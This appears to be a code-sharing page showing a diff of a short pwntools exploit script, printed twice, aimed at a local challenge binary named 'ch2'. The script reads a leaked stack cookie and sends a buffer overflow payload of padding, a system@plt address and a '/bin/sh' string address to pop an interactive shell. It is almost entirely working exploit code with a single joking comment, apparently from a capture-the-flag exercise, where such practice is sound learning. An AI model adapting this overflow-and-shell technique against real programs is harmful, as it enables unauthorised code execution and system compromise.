0xPwny · April 1, 2018 14:10
diff --git a/exploit.py b/exploit.py
 from pwn import *

 #RUN IT AND [HOPE] IT WILL JUMP TO YOUR [ROP] :D

 r = process("./ch2")

 pause()

 r.recvuntil("ID:")

 COOKIE = r.recvline().strip()

 binsh = 0x08048875
 systemplt = 0x80484a0

 #exitplt = 0x080484b0

 pld1 = "A"*4
 pld1 += p32(systemplt)
 pld1 += "A"*4
 pld1 += p32(binsh)

 pld2 = pld1*4

 pld2 += COOKIE
 pld2 += p32(0x0)

 r.sendline(pld2)
 r.interactive()
	from pwn import *

	#RUN IT AND [HOPE] IT WILL JUMP TO YOUR [ROP] :D

	r = process("./ch2")

	pause()

	r.recvuntil("ID:")

	COOKIE = r.recvline().strip()

	binsh = 0x08048875
	systemplt = 0x80484a0

	#exitplt = 0x080484b0

	pld1 = "A"*4
	pld1 += p32(systemplt)
	pld1 += "A"*4
	pld1 += p32(binsh)

	pld2 = pld1*4

	pld2 += COOKIE
	pld2 += p32(0x0)

	r.sendline(pld2)
	r.interactive()